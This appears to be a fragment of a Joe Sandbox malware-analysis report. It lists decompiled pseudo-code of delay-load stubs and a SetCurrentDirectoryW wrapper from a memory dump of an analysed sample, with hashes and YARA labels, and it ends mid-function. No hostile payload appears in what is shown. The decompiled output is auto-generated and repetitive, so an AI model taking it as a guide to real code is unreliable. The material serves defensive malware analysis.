Function 0007D997 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007D997() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bdc4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007d89e
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 443b82a6a79db0ac62ffa3cf14f95f265bc687d8847500ca812ff29a56db8d69
Instruction ID: f3e01355067a5d8995bb05e92ab99455e08667c84c03402e0fd5f260390083db
Opcode Fuzzy Hash: 443b82a6a79db0ac62ffa3cf14f95f265bc687d8847500ca812ff29a56db8d69
Instruction Fuzzy Hash: 7CA0129196D0027C300821007D12C3A062CCEC0B20330C41FF04F940C1A84428045435

Uniqueness

Uniqueness Score: -1.00%

Function 0007DAA5 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007DAA5() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bde4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007daad
0x0007dab2
0x0007dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DAB2

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 682c9408727b25b91e7b6faa708659b104ecd25c954920e9b807bad1b84b6295
Instruction ID: 92d2f6c974ed8a3db0308aa8e4196909ac78b5b6f695314b26be7c261cbb9e78
Opcode Fuzzy Hash: 682c9408727b25b91e7b6faa708659b104ecd25c954920e9b807bad1b84b6295
Instruction Fuzzy Hash: 3CA0029566D5017C35587151BE16D7E126CDAD0B21330C51FF50F98045654858555475

Uniqueness

Uniqueness Score: -1.00%

Function 0007DAC0 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007DAC0() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bde4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007daad
0x0007dab2
0x0007dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DAB2

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 552df04b5918cfcaf6bd70092df44e4ef4fb9386dfa5653d9d7c65d30ffe6cc5
Instruction ID: 78bd587120d6cbd18c4592b51d68c888b210fb3a7d29fc15c3a1665d643061ca
Opcode Fuzzy Hash: 552df04b5918cfcaf6bd70092df44e4ef4fb9386dfa5653d9d7c65d30ffe6cc5
Instruction Fuzzy Hash: 86A0029556D1027C351871517E16D7E126CDAC4B61330C51FF50F98045654858555475

Uniqueness

Uniqueness Score: -1.00%

Function 0007DACA Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007DACA() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bde4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007daad
0x0007dab2
0x0007dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DAB2

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 23a3b18809cad3ea1f6ca8ea8f9d3fb8c9fdd96b4e71f15af187cf1ada4fd32c
Instruction ID: 78bd587120d6cbd18c4592b51d68c888b210fb3a7d29fc15c3a1665d643061ca
Opcode Fuzzy Hash: 23a3b18809cad3ea1f6ca8ea8f9d3fb8c9fdd96b4e71f15af187cf1ada4fd32c
Instruction Fuzzy Hash: 86A0029556D1027C351871517E16D7E126CDAC4B61330C51FF50F98045654858555475

Uniqueness

Uniqueness Score: -1.00%

Function 0007DAE8 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007DAE8() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bde4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007daad
0x0007dab2
0x0007dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DAB2

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 48425f7c30426037ce3372473fd425e5d45c357325cecb2311e1329820bfbcf4
Instruction ID: 78bd587120d6cbd18c4592b51d68c888b210fb3a7d29fc15c3a1665d643061ca
Opcode Fuzzy Hash: 48425f7c30426037ce3372473fd425e5d45c357325cecb2311e1329820bfbcf4
Instruction Fuzzy Hash: 86A0029556D1027C351871517E16D7E126CDAC4B61330C51FF50F98045654858555475

Uniqueness

Uniqueness Score: -1.00%

Function 0007DAF2 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007DAF2() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bde4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007daad
0x0007dab2
0x0007dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DAB2

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a00b8a24bae405d11387fe648504d34675056ea926dbcbc66142d4f155b92bdc
Instruction ID: 78bd587120d6cbd18c4592b51d68c888b210fb3a7d29fc15c3a1665d643061ca
Opcode Fuzzy Hash: a00b8a24bae405d11387fe648504d34675056ea926dbcbc66142d4f155b92bdc
Instruction Fuzzy Hash: 86A0029556D1027C351871517E16D7E126CDAC4B61330C51FF50F98045654858555475

Uniqueness

Uniqueness Score: -1.00%

Function 0007DAFC Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007DAFC() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bde4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007daad
0x0007dab2
0x0007dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DAB2

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 442ab030e34f7a9166d465d547fc4b13e38f476aeaced20c4f1fb2f01de24243
Instruction ID: 78bd587120d6cbd18c4592b51d68c888b210fb3a7d29fc15c3a1665d643061ca
Opcode Fuzzy Hash: 442ab030e34f7a9166d465d547fc4b13e38f476aeaced20c4f1fb2f01de24243
Instruction Fuzzy Hash: 86A0029556D1027C351871517E16D7E126CDAC4B61330C51FF50F98045654858555475

Uniqueness

Uniqueness Score: -1.00%

Function 0007DBF7 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007DBF7() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9be44); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007dbd0
0x0007dbd5
0x0007dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DBD5

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 57207358acc851a85736db623f287cf721219e86a0a1187aecf0b4ae080b2451
Instruction ID: 39e504e274d38e09d5c3b6a181d9a34770ea799204afaa438c67bdd2282bbae9
Opcode Fuzzy Hash: 57207358acc851a85736db623f287cf721219e86a0a1187aecf0b4ae080b2451
Instruction Fuzzy Hash: F5A0129567C002BC300811003D07C7A123CCAC0B20330C41FF10F840415A440C041034

Uniqueness

Uniqueness Score: -1.00%

Function 0007DC0B Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007DC0B() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9be44); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007dbd0
0x0007dbd5
0x0007dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DBD5

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 27bb836ece322e78f0aad4762e9565abbc55a75a482994cf234c37729fc655c4
Instruction ID: 39e504e274d38e09d5c3b6a181d9a34770ea799204afaa438c67bdd2282bbae9
Opcode Fuzzy Hash: 27bb836ece322e78f0aad4762e9565abbc55a75a482994cf234c37729fc655c4
Instruction Fuzzy Hash: F5A0129567C002BC300811003D07C7A123CCAC0B20330C41FF10F840415A440C041034

Uniqueness

Uniqueness Score: -1.00%

Function 0007DC15 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007DC15() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9be44); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007dbd0
0x0007dbd5
0x0007dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DBD5

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8eafbcfe08c4d7f5073444a18904c0d552245f36b3dbb717d82b069775825c0e
Instruction ID: 39e504e274d38e09d5c3b6a181d9a34770ea799204afaa438c67bdd2282bbae9
Opcode Fuzzy Hash: 8eafbcfe08c4d7f5073444a18904c0d552245f36b3dbb717d82b069775825c0e
Instruction Fuzzy Hash: F5A0129567C002BC300811003D07C7A123CCAC0B20330C41FF10F840415A440C041034

Uniqueness

Uniqueness Score: -1.00%

Function 0007DC1F Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007DC1F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9be44); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007dbd0
0x0007dbd5
0x0007dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DBD5

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 22a12b55b140c511b0c1eb9600e170e63d3b62cc6ae619fffb62a55ee91915ae
Instruction ID: 39e504e274d38e09d5c3b6a181d9a34770ea799204afaa438c67bdd2282bbae9
Opcode Fuzzy Hash: 22a12b55b140c511b0c1eb9600e170e63d3b62cc6ae619fffb62a55ee91915ae
Instruction Fuzzy Hash: F5A0129567C002BC300811003D07C7A123CCAC0B20330C41FF10F840415A440C041034

Uniqueness

Uniqueness Score: -1.00%

Function 0007DC44 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007DC44() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9be64); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007dc31
0x0007dc36
0x0007dc3d

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DC36

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1dc16fa1e2d89714ad942d6c3d6b826735bf8c1dfef34cb8eb5ef9e8437de023
Instruction ID: 70b0e2d553993eca9e93ced8eaab7273bf2be5bc89039195197bd4e613cc96ee
Opcode Fuzzy Hash: 1dc16fa1e2d89714ad942d6c3d6b826735bf8c1dfef34cb8eb5ef9e8437de023
Instruction Fuzzy Hash: D6A0029596D103BD351D61517D16D7A133CDAD4B61330C91FF50F9405155846C555435

Uniqueness

Uniqueness Score: -1.00%

Function 0007DC4E Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007DC4E() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9be64); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007dc31
0x0007dc36
0x0007dc3d

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DC36

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2547ca36959bfe8a626261d6c5a8eed411fd1e86ad7b2344af3a90a9117583c8
Instruction ID: 70b0e2d553993eca9e93ced8eaab7273bf2be5bc89039195197bd4e613cc96ee
Opcode Fuzzy Hash: 2547ca36959bfe8a626261d6c5a8eed411fd1e86ad7b2344af3a90a9117583c8
Instruction Fuzzy Hash: D6A0029596D103BD351D61517D16D7A133CDAD4B61330C91FF50F9405155846C555435

Uniqueness

Uniqueness Score: -1.00%

Function 0007A322 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007A322(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}

0x0007a326
0x0007a32e
0x0007a332

APIs

SetCurrentDirectoryW.KERNELBASE(?,0007A587,C:\Users\user\Desktop,00000000,000A946A,00000006), ref: 0007A326

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 4f449fca267cf6e4ce23146e30467331eca2ee8496a72d1a98e206e03b260a75
Instruction ID: 434d641b1f56572ca04c32f91accd1e13714a6fed6e126d75a6f7bc2334bbbb4
Opcode Fuzzy Hash: 4f449fca267cf6e4ce23146e30467331eca2ee8496a72d1a98e206e03b260a75
Instruction Fuzzy Hash: D4A01230194006568A000B30CC09C1576506760702F0086227002C00B0CB308C14A900

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0007B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286
timewindowfileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0007B8E0(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
